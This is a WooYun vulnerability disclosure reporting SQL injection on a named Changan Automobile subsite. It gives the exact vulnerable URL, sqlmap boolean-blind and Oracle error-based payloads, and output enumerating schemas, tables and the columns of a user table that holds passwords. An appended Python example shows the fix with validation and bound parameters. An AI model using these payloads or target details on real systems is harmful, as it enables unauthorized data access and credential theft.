Vulnerability summary
Defect ID: wooyun-2014-077100
Title: SQL injection in a subsite of Chongqing Changan Automobile Co., Ltd.
Vendor: cncert (National Internet Emergency Center)
Author: 卡梅隆@广坤
Submitted: 2014-09-23 19:18
Fix time: 2014-11-07 19:20
Disclosed: 2014-11-07 19:20
Vulnerability type: SQL injection
Severity: Medium
Self-assessed rank: 8
Status: vendor could not be contacted, or vendor actively ignored the report
Source: http://www.wooyun.org; for questions or help please contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2014-09-23: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-11-07: The vendor has actively ignored the vulnerability; details disclosed to the public
Brief description:
SQL injection in a subsite of Chongqing Changan Automobile Co., Ltd.
Detailed description:
SQL injection in a subsite of Chongqing Changan Automobile Co., Ltd.
Proof of vulnerability:
Injection point: http://wx.changan.com.cn/miccar_f202/index2.jsp?itemid=7
Place: GET
Parameter: itemid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: itemid=7 AND 1528=1528
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: itemid=7 AND 7147=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(107)||CHR(115)||CHR(118)||CHR(58)||(SELECT (CASE WHEN (7147=7147) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(109)||CHR(97)||CHR(115)||CHR(58)||CHR(62))) FROM DUAL)
web application technology: JSP
back-end DBMS: Oracle
available databases [8]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] MINICAR
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WJCACAR
current schema (equivalent to database on Oracle): 'MINICAR'
current user: 'MINICAR'
Database: MINICAR
[19 tables]
+-------------------+
| T_CAR             |
| T_CARATT          |
| T_CARATTTYPE      |
| T_CARIMG          |
| T_CONTENT         |
| T_DEALER          |
| T_GIFT            |
| T_ITEM            |
| T_MEMBER          |
| T_MEMBERCAR       |
| T_MEMBER_ARTICLE  |
| T_MEMBER_GIFT     |
| T_MEMBER_RECOMAND |
| T_MSG             |
| T_RESERVE         |
| T_RESERVE20101206 |
| T_USERS           |
| T_VISITED_DETAIL  |
| T_VISITED_NUM     |
+-------------------+
Database: MINICAR
Table: T_USERS
[5 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| DEALER   | VARCHAR2 |
| FUN      | VARCHAR2 |
| PASSW    | VARCHAR2 |
| USERID   | VARCHAR2 |
| USERNAME | VARCHAR2 |
+----------+----------+
The rest, you know.
Fix recommendation:
Filter the input!
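To make the "filter" advice concrete, here is an added example (not code from the report or from the affected site) that reconstructs the kind of string-built query behind the itemid parameter and places the standard remediation beside it: a strict allow-list check on the parameter followed by a bound query parameter. It assumes a hypothetical T_ITEM table in the MINICAR schema and uses SQLite as a stand-in for Oracle so that it runs offline.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a guessed T_ITEM table (the report lists the
    table name but not its columns). SQLite stands in for Oracle here."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE T_ITEM (ITEMID INTEGER PRIMARY KEY, TITLE TEXT)")
    conn.executemany("INSERT INTO T_ITEM VALUES (?, ?)",
                     [(7, "item seven"), (8, "item eight")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, itemid: str) -> list:
    """Hypothetical reconstruction of the flaw: the raw itemid string is
    concatenated into the WHERE clause, so 'itemid=7 AND 1528=1528' is parsed
    as SQL and the page content reveals whether the appended condition is
    true. That is the boolean-based blind behaviour sqlmap reported."""
    sql = "SELECT TITLE FROM T_ITEM WHERE ITEMID = " + itemid
    return [row[0] for row in conn.execute(sql)]


def is_valid_itemid(itemid: str) -> bool:
    """Allow-list check: only a short run of ASCII digits is an item id."""
    return re.fullmatch(r"[0-9]{1,10}", itemid) is not None


def lookup_safe(conn: sqlite3.Connection, itemid: str) -> list:
    """Hardened form: validate the parameter shape, then bind it as a value
    so the database never interprets user input as SQL."""
    if not is_valid_itemid(itemid):
        raise ValueError("itemid must be a plain integer")
    sql = "SELECT TITLE FROM T_ITEM WHERE ITEMID = ?"
    return [row[0] for row in conn.execute(sql, (int(itemid),))]


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "7 AND 1528=1528"))  # ['item seven']: condition true
    print(lookup_vulnerable(db, "7 AND 1528=1529"))  # []: condition false
    print(lookup_safe(db, "7"))                      # ['item seven']
    try:
        lookup_safe(db, "7 AND 1528=1528")
    except ValueError as exc:
        print("rejected:", exc)
```

The contrast between the two true/false responses of lookup_vulnerable is exactly the signal a blind injection relies on; lookup_safe rejects the same input before any SQL is executed.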
Copyright notice: when reposting, please credit the source: 卡梅隆@广坤@乌云
Vulnerability response
Vendor response:
Vendor could not be contacted, or vendor actively declined the report